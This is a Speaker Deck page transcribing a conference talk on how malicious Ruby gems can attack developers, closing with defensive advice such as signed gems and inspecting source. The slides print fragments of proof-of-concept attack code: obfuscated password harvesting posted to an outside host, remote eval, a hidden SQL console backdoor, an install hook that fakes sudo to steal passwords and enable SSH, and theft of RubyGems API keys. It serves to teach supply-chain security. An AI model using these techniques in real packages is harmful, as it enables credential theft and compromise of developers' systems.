Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Hacking with Gems (denver.rb)
Search
Benjamin Smith
August 13, 2014
Technology
0
160
Hacking with Gems (denver.rb)
Benjamin Smith
August 13, 2014
Tweet
Share
More Decks by Benjamin Smith
See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
86
Refactoring Rails Apps with Engines
benjaminleesmith
4
840
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
230
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
110
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
380
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
400
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
220
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.2k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.5k
Other Decks in Technology
See All in Technology
シェルとPerlの使い分け、 そういった思考の道具は、どこから来て、どこへゆくのか?v1.1.0
fmlorg
0
680
Perlで始めるeBPF: 自作Loaderの作り方 / Getting started with eBPF in Perl_How to create your own Loader
takehaya
1
1.1k
Amplify Gen 2ではじめる 生成AIアプリ開発入門
tsukuboshi
0
350
KubeVirt Networking ONIC 2024
orimanabu
4
700
UE5の雑多なテク
ryuichikawano
0
470
Oracle Cloud Infrastructure:2024年10月度サービス・アップデート
oracle4engineer
PRO
0
100
40代後半で開発エンジニアからクラウドインフラエンジニアにキャリアチェンジし、生き残れる自信がようやく持てた話
iwamot
0
450
スタサプ ForSCHOOLアプリのシンプルな設計
recruitengineers
PRO
3
770
CData Virtuality を活かせるキーシナリオと製品デモ
cdataj
0
410
The road to green code (with Sonar)
bluehats
0
120
テクニカルライターのチームで「目標」をどう決めたか / MVV for a Team of Technical Writers
lycorptech_jp
PRO
3
140
Bluesky 2019〜2022
yamarten
1
110
Featured
See All Featured
Writing Fast Ruby
sferik
626
60k
Optimising Largest Contentful Paint
csswizardry
31
2.8k
GraphQLとの向き合い方2022年版
quramy
43
13k
GraphQLの誤解/rethinking-graphql
sonatard
65
9.9k
Statistics for Hackers
jakevdp
796
220k
Web development in the modern age
philhawksworth
205
10k
Fontdeck: Realign not Redesign
paulrobertlloyd
81
5.2k
The Pragmatic Product Professional
lauravandoore
31
6.2k
KATA
mclloyd
28
13k
Designing for humans not robots
tammielis
249
25k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
22k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
110
6.9k
Transcript
Hacking with Gems Benjamin Smith @benjamin_smith
How to punk your friends with gems Benjamin Smith @benjamin_smith
How-to get rich quick and (maybe) not go to jail!
Benjamin Smith @benjamin_smith
Four reasons you should NOT trust Benjamin Smith @benjamin_smith
None
who i am
who i am
who i am
what i am NOT
None
please do not try this at home
please do not try this at home
None
None
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
once upon a time
GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview
(= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)
what’s the worst that could happen?
None
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
before... github.com/benjaminleesmith/awesome-rails-flash-messages
after! github.com/benjaminleesmith/awesome-rails-flash-messages
some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages
i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages
“development.log” ... "user"=>{"email"=>"
[email protected]
", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages
elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages
profit • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
a one way ticket to
that was easy. what else can I do?
gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector
show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
/users/sign_in github.com/benjaminleesmith/net_http_detector
/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector
hello db access! github.com/benjaminleesmith/net_http_detector
SELECT * FROM users; github.com/benjaminleesmith/net_http_detector
UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector
CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector
careful of wolves in sheep’s clothing
profit • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
i like the beach
that was easy. what else can I do?
gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s
what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
None
what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s
better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s
behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
what what github.com/benjaminleesmith/better_date_to_s
i can haz source github.com/benjaminleesmith/better_date_to_s
truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
that was easy hard. what else can I do? (that's
easier)
gem install bunlder
gem install be_truthy github.com/benjaminleesmith/be_truthy
what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy
what it ACTUALLY does github.com/benjaminleesmith/be_truthy
github.com/benjaminleesmith/be_truthy
file tree looks ok github.com/benjaminleesmith/be_truthy
source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy
but what was this? github.com/benjaminleesmith/be_truthy
I see no C github.com/benjaminleesmith/be_truthy
run the what file? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
there is no Rakefile github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
what does the Rakefile do? github.com/benjaminleesmith/be_truthy
sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy
File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy
FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy
what does "sudo" do now? github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy
/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy
ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy
take away: don't install ben's gems
None
how could I get you to install my gems?
what gems are trustworthy?
how can I add my code to already trusted gems?
back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
now I own your gems github.com/benjaminleesmith/be_truthy
> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy
do people trust your gems?
do people who install your gems have trustworthy gems?
None
there’s still one problem
bootstrapping
being popular sucks
conferences
social engineering
None
None
None
so what happens now?
ruby gems goes down
heroku deploys go down
i go to the beach
ruby gems goes down
heroku deploys go down
recovery
so what now?
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
Little Snitch obdev.at/products/littlesnitch/index.html
gem install be_truthy github.com/benjaminleesmith/be_truthy
fseventer fernlightning.com/doku.php?id=software:fseventer:start
don’t “gem install” from strangers
gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
None
None
curl -sSL https://get.rvm.io | bash
gem install rails -P HighSecurity
> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:
While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy
gem cert --build
https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html
sandboxing
github.com/rubygems/rubygems
tools to detect malicious code
private gem repos
do not try this at home
don't install gems you don't need to
pay attention to what your gems do
monitor your system
read the source
gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary
on install github.com/benjaminleesmith/coal-mine-canary
the results github.com/benjaminleesmith/coal-mine-canary
thank you!
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith